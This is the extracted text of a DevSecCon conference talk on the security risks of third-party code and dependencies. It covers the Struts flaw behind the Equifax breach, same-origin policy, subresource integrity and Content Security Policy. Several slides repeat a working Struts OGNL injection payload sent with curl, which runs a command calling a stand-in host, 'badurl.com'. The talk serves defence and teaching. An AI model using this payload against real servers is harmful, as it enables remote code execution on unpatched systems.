Join the conversation #DevSecCon
BY TIM KADLEC @TKADLEC
Their Problems Are Your Problems
THEIR PROBLEMS AREYOUR PROBLEMS
Tim Kadlec | @tkadlec
HELL IS OTHER PEOPLE’S CODECODE
CODE
CODE
CONTEXT
OPINIONS
ASSUMPTIONS
WEB IS POWERED BY OTHER PEOPLE’S CODE
9 MILLION Different Users
28% More artifacts indexed in past year
23,411,471 Packages downloaded per month
HUGE BOOST FOR PRODUCTIVITY
1,000 DEPENDENCIES
1,000 DEPENDENCIES~5 CONTRIBUTORS
1,000 DEPENDENCIES~5 CONTRIBUTORS
5,000 DEVELOPERS
5,000 DEVELOPERS
OFFLOAD THE WORK But not the
RISK
OFFLOAD THE WORK But not the
RESPONSIBILITY
http://bit.ly/struts-vuln
http://bit.ly/snyk-struts
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }
return request; }
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }
return request; }
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }
return request; }
String errorMessage = buildErrorMessage(e, new Object[]{e.getPermittedSize(), e.getActualSize()});
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
MARCH 6: FIXED VERSION RELEASED MARCH 7: EXPLOIT SCRIPTS APPEAR MAY 13-JULY 30: EQUIFAX BREACH SEPTEMBER 7: BREACH ANNOUNCED
0
225
450
675
900
2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017
OPEN-SOURCE LIBRARY VULNS BY YEAR
The human error was that the individual who’s responsible for communicating in the organization to apply the patch, did not.
“
EVERYONE’S RESPONSIBILITY
LAYERS OF DEFENSE
77% USE A VULNERABLE JS LIBRARY
http://bit.ly/lh-audit
http://bit.ly/sonarwhal
~35% Third-Party Resources
(2013)2013
2013
2013
2013
2013 2017
2013 2017~53% Third-Party Resources
77-99% Third-Party Resources
38% of sites
SAME-ORIGIN POLICY
ORIGIN: SCHEME + HOSTNAME + PORT
http://foo.com/index.html
http://foo.com/index.htmlhttp://scheme
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:80/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:80/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
--disable-web-security
about:blank
javascript:
var xhr = new XMLHttpRequest(); xhr.open('GET', "https://www.devseccon.com/"); xhr.send();
<script src=“..."></script>
<img src="..." />
<link href="..." />
SUBRESOURCE INTEGRITY
<script src="https://foo.com/framework.js" integrity=“sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"> </script>
<script src="https://foo.com/framework.js" integrity=“sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"> </script>
CONTENT SECURITY POLICY (CSP)
SAME-ORIGIN POLICY?
WHITELIST
Content-Security-Policy: policy;
Content-Security-Policy: resource-directive source-list;
Content-Security-Policy: script-src ‘self’ https://apis.google.com;
base-uri child-src connect-src font-src form-action frame-ancestors img-src
media-src object-src plugin-types report-uri style-src script-src upgrade-insecure-requests
Content-Security-Policy: default-src ‘self’;
none self unsafe-inline unsafe-eval
Content-Security-Policy: default-src 'self'; script-src ‘nonce-2726c7f26c'
<script nonce="2726c7f26c"> alert(123); </script>
Content-Security-Policy: script-src 'sha256-cLuU6nVzrYJlo7rUa6PFrPQrEUpOHllb5ic='
Content-Security-Policy-Report-Only:
CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
Content-Security-Policy-Report-Only: default-src https:; form-action https:; report-uri https://myreport.com;
Content-Security-Policy: default-src https:; form-action https:; report-uri https://myreport.com;
CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
SERVERLESS & PAAS
UNPATCHED SERVERS
COMPROMISED SERVERS
WHAT’S THE PATH OF LEAST RESISTANCE?
http://bit.ly/bucket-finder
SECURE BY DEFAULT
OFFLOAD THE WORK But not the
RESPONSIBILITY
REAL PEOPLE PAYING THE PRICE
http://bit.ly/owasp-cloud
SYSTEM CONFIGURATION NETWORK LAYER FRONT-END CODE BACK-END COMPONENTS THIRD-PARTY SERVICES
LAYERS OF DEFENSE
EVERYONE’S RESPONSIBILITY
BRING SECURITY TO THE TEAM
WEB IS POWERED BY OTHER PEOPLE’S CODE
WEB’S SAFETY & STABILITY
IS UP TO US
Join the conversation #DevSecCon
Thank you!Tim Kadlec | @tkadlec